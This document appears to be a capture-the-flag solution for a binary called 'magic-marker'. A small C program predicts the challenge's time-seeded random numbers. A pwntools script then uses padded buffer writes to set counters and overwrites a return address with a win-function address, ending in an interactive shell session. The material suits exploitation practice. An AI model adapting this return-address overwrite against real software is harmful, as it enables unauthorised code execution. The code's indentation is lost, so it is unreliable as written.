timer.c

```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main() {
time_t t = time(0);
srand(t);
int n1 = rand() % 40;
int n2 = rand() % 40;
printf("%d\n", n1);
printf("%d\n", n2);
return 0;
}

```

exploit.py

```python
from pwn import *

def pwn():
n1 = int(h.recvline().strip())
n2 = int(h.recvline().strip())

r.sendline(b'jump up and down')

# decrease first random number to zero
for x in range(n1):
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendafter(b'write?', b'A'*28 + p32(8))
r.recvuntil(b'up):')
r.sendline(b'w')

# decrease second random number to -1
for x in range(n2+1):
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendafter(b'write?', b'A'*28 + p32(1))
r.recvuntil(b'up):')
r.sendline(b'a')

# write win function address to return address
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendlineafter(b'write?', b'A' * 8 + p64(0x400fa0))

print(r.recvall())
r.interactive()

if __name__ == '__main__':
h = process('./timer')

if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
else:
r = process(['./magic-marker'])
print(util.proc.pidof(r))

pwn()
```